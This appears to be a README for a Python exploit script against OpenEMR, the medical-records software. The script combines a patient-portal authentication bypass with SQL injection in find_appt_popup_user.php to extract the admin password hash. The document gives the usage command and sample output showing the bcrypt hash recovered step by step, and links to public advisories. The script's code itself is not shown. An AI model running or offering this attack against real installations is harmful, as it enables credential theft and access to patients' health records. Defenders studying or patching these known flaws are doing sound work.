This script abuses two known vulnerabilities to extract the admin password hash: An authentication bypass to the Patient portal and SQL injection found in find_appt_popup_user.php
https://packetstormsecurity.com/files/163181/OpenEMR-5.0.1.3-Authentication-Bypass.html
https://www.open-emr.org/wiki/images/1/11/Openemr_insecurity.pdf
Usage:
python3 openemrsqli.py IP:PORT
Result example:
[+] Host Vulnerable. Proceeding exploit
...
$2y$10$b/7wbVR3tTFzjTSPPSmzgOhsYbN.mZEWms58Uu6mFscm.UB3UFn
$2y$10$b/7wbVR3tTFzjTSPPSmzgOhsYbN.mZEWms58Uu6mFscm.UB3UFnB
$2y$10$b/7wbVR3tTFzjTSPPSmzgOhsYbN.mZEWms58Uu6mFscm.UB3UFnBy
[+] Hash:$2y$10$b/7wbVR3tTFzjTSPPSmzgOhsYbN.mZEWms58Uu6mFscm.UB3UFnBy